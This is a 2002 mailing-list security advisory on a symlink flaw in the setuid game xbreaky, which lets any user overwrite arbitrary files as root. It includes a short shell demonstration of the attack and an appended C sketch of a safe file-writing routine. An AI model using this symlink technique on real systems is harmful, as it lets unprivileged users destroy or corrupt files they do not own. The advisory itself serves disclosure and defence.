Full Disclosure mailing list archives
xbreaky symlink vulnerability
From: m.v.berkum () obit nl (Marco van Berkum)
Date: Tue, 10 Sep 2002 20:24:36 +0200
-----------------------------------------------------------------------
Title:             xbreaky 0.0.4 symlink vulnerability
Author:            Marco van Berkum
Classification:    High risk
Date:              10/09/2002
Email:             m.v.berkum () obit nl
Company:           OBIT
Company site:      http://www.obit.nl
Personal website:  http://ws.obit.nl
-----------------------------------------------------------------------

About xbreaky
-------------
xbreaky is a breakout game for X written by Dave Brul which can be
downloaded from http://xbreaky.sourceforge.net. xbreaky is added to the
OpenBSD ports tree, NetBSD tree and possibly others.

Problem
-------
By default xbreaky is installed as suid and can be abused to overwrite
any file on the filesystem, by any user.

Exploit
-------
xbreaky uses $HOME/.breakyhighscores to write the highscores to. When
$HOME/.breakyhighscores is symlinked to another file (*any* file) it
simply overwrites it as root user.

Example
-------
root@animal:/home/marco# echo "bla" >rootfile
root@animal:/home/marco# chmod 600 rootfile
root@animal:/home/marco# exit
logout
marco@animal:~$ ln -s rootfile .breakyhighscores
marco@animal:~$ xbreaky

Now I play a game and set highscore as user "lol", then I exit the game.
It's a nice game btw :)

marco@animal:~$ cat rootfile
cat: rootfile: Permission denied
marco@animal:~$ su -
Password:
root@animal:~# cat /home/marco/rootfile
lol    <- voila, our highscore user

Workaround
----------
Remove suidbit.

Author
------
The author has been notified.

Credits
-------
Thanks to Dennis Oelkers for testing.

--
find / -user your -name base -exec chown us:us {}\;
----------------------------------------
| Marco van Berkum / MB17300-RIPE      |
| m.v.berkum () obit nl / http://ws.obit.nl |
----------------------------------------
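Added example, not part of the original advisory and not xbreaky's code: a C sketch of how a setuid program can write a per-user score file without the behaviour described above, by switching to the invoking user's uid and refusing a symlink at the final path component. The function names and the temporary-directory scenario are hypothetical and constructed for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: returns an fd open for writing, or -1. */
int open_scores_safely(const char *path)
{
    struct stat st;
    /* Access the file as the invoking user, not as the setuid owner. */
    if (seteuid(getuid()) != 0)
        return -1;
    /* O_NOFOLLOW: open() fails if the last path component is a symlink.
     * No O_TRUNC here, so nothing is modified before the checks below. */
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    /* Check the opened object itself: regular file, owned by the caller,
     * and not reachable through an extra hard link. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != getuid() || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario mirroring the advisory's layout in a temp dir.
 * Returns 1 if the regular file is accepted and the symlink is refused. */
int symlink_refused(void)
{
    char dir[] = "/tmp/scoresXXXXXX", target[64], lnk[64];
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(target, sizeof target, "%s/rootfile", dir);
    snprintf(lnk, sizeof lnk, "%s/.breakyhighscores", dir);
    int t = open_scores_safely(target);   /* plain file: accepted */
    if (t < 0 || symlink(target, lnk) != 0)
        return -1;
    close(t);
    int fd = open_scores_safely(lnk);     /* symlink: refused */
    int refused = (fd < 0);
    if (fd >= 0)
        close(fd);
    unlink(lnk); unlink(target); rmdir(dir);
    return refused;
}
```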